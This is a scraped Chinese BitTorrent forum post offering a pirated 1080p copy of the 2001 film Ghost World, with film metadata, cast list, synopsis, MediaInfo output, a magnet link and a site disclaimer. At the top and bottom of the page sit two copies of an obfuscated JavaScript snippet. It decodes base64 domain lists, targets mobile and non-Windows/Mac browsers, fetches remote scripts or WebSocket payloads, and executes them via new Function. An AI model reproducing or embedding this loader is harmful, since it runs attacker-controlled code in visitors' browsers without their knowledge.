幽灵世界[中文字幕].Ghost.World.2001.1080p.BluRay.DTS.x265-10bit 11.14GB

版主小s 23天前 219

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 幽灵世界 / 黐孖妹 / 青春迷魂阵 / 鬼地方

◎片 名 Ghost World

◎年 代 2001

◎产 地 美国 / 英国 / 德国

◎类 别 剧情 / 喜剧

◎语 言 英语

◎上映日期 2001-08-03

◎IMDb链接 https://www.imdb.com/title/tt0162346/

◎豆瓣评分 7.9/10 (11975人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304868/

◎片 长 111 分钟

◎导 演 泰利·茨威戈夫 Terry Zwigoff (id:1045150)

◎编 剧 丹尼尔·克洛维斯 Daniel Clowes (id:1000688)

泰利·茨威戈夫 Terry Zwigoff (id:1045150)

◎演 员 索拉·伯奇 Thora Birch (id:1031804)

斯嘉丽·约翰逊 Scarlett Johansson (id:1054453)

史蒂夫·布西密 Steve Buscemi (id:1054409)

布拉德·兰弗洛 Brad Renfro (id:1022594)

伊里纳·道格拉斯 Illeana Douglas (id:1025235)

鲍勃·巴拉班 Bob Balaban (id:1022775)

斯塔西·达维斯 Stacey Travis (id:1055813)

戴夫·谢里登 Dave Sheridan (id:1032105)

汤姆·麦高恩 Tom McGowan (id:1022854)

布莱恩·乔治 Brian George (id:1054464)

帕特·希利 Pat Healy (id:1095374)

里尼·贝尔 Rini Bell (id:1062019)

T·J·塞恩 T.J. Thyne (id:1153954)

大卫·克罗斯 David Cross (id:1071279)

黛安·萨林格 Diane Salinger (id:1146734)

Jerry Rector Jerry Rector (id:1145205)

詹姆士·谢 James Sie (id:1142649)

保罗·基斯 Paul Keith (id:1104933)

布鲁斯·格洛弗 Bruce Glover (id:1099040)

丹尼尔·格拉维斯 Daniel Graves (id:1095962)

Charles Schneider Charles Schneider (id:1148625)

阿莱克斯·索洛维茨 Alex Solowitz (id:1155728)

埃伦海兹 Alan Heitz (id:1171676)

Nate Wood Nate Wood (id:1191269)

Greg Wendell Reid Greg Wendell Reid (id:1200545)

J.J. Bad Boy Jones J.J. Bad Boy Jones (id:1214350)

Venus DeMilo Venus DeMilo (id:1282220)

劳伦斯·福克斯 Laurence Fox (id:1317403)

查尔斯·C·史蒂文森 Charles C. Stevenson Jr. (id:1388512)

Sid Hillman Sid Hillman (id:1092233)

黛比·德里贝里 Debi Derryberry (id:1085361)

派特里克·费斯克勒 Patrick Fischler (id:1084105)

乔·比斯科 Joy Bisco (id:1028108)

Edward T. McAvoy Edward T. McAvoy (id:1023651)

Steve Pierson Steve Pierson (id:1019603)

特瑞·加尔 Teri Garr (id:1036451)

马克·万恩 Marc Vann (id:1050182)

马特·多赫蒂 Matt Doherty (id:1083798)

John Bunnell John Bunnell (id:1077617)

Mary Bogue Mary Bogue (id:1062011)

琼·布莱尔 Joan Blair (id:1061284)

艾什丽·佩顿 Ashley Peldon (id:1000298)

Pippa Cross Pippa Cross (id:1032950)

约翰·马尔科维奇 John Malkovich (id:1041013)

利安妮·哈尔丰 Lianne Halfon (id:1023509)

迈克尔·山姆伯格 Michael Shamberg (id:1297310)

罗素·史密斯 Russell Smith (id:1157667)

David Kitay David Kitay (id:1288652)

阿方索·比托 Affonso Beato (id:1010102)

卡珊德拉·库卢昆迪斯 Cassandra Kulukundis (id:1051053)

Edward T. McAvoy Edward T. McAvoy (id:1023651)

Alan E. Muraoka Alan E. Muraoka (id:1051385)

玛丽·索弗瑞斯 Mary Zophres (id:1000969)

Christopher Dusendschon Christopher Dusendschon (id:1180674)

◎标 签 青春 / 美国 / 成长 / ScarlettJohansson / 美国电影 / 2001 / 喜剧 / 电影

◎简 介

有这么一对好友,她们是同是20岁的伊尼德(索拉?伯奇 饰)与丽贝卡(斯嘉丽?约翰逊 饰)。虽然她们性格十分迥异,但她们还是常常待在一起,讨论发生在她们周遭的人与事物,她们向对方表达自己对现实生活的看法,或褒或贬。就这样一直如此,持续着她们的友谊。

两人开始疏远是在高中毕业以后。丽贝卡开始工作了,伊尼德却想到另外一个地方继续学业,两人不太同步的生活开始令双方的价值观产生了变化,她们身边各自有不同的人出现,有各种不同的事情发生,现实把她们从彼此的生活中渐渐拉走了,生活又将会为她们带来些什么?

◎获奖情况 (共3项)

第74届奥斯卡金像奖 (2002)

最佳改编剧本(提名)

第59届金球奖 (2002)

电影类 音乐/喜剧片最佳女主角(提名)

└──索拉·伯奇 (id:1031804)

电影类 最佳男配角(提名)

└──史蒂夫·布西密 (id:1054409)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 131374901231868007039701751894275897787 (0x62D5E2B8253E168FC18601534D61B9BB)

  4. Complete name : [email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 11.1 GiB

  8. Duration : 1 h 51 min

  9. Overall bit rate : 14.3 Mb/s

  10. Movie name : Ghost World 2001 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-11-09 12:00:14

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 51 min

  21. Bit rate : 12.8 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.267

  31. Stream size : 9.94 GiB (89%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 51 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.18 GiB (11%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 42 min

  62. Bit rate : 31.5 kb/s

  63. Count of elements : 1985

  64. Stream size : 23.2 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 42 min

  76. Bit rate : 31.9 kb/s

  77. Count of elements : 1985

  78. Stream size : 23.4 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:07:45.423 : en:Chapter 02

  86. 00:14:04.886 : en:Chapter 03

  87. 00:16:40.708 : en:Chapter 04

  88. 00:19:37.051 : en:Chapter 05

  89. 00:36:32.732 : en:Chapter 06

  90. 00:51:04.019 : en:Chapter 07

  91. 00:58:29.089 : en:Chapter 08

  92. 01:08:13.047 : en:Chapter 09

  93. 01:15:08.462 : en:Chapter 10

  94. 01:23:37.262 : en:Chapter 11

  95. 01:41:28.666 : en:Chapter 12




复制代码


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:E8D3158ADF12B91DDE667B899EA9E7FD372E61D1

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};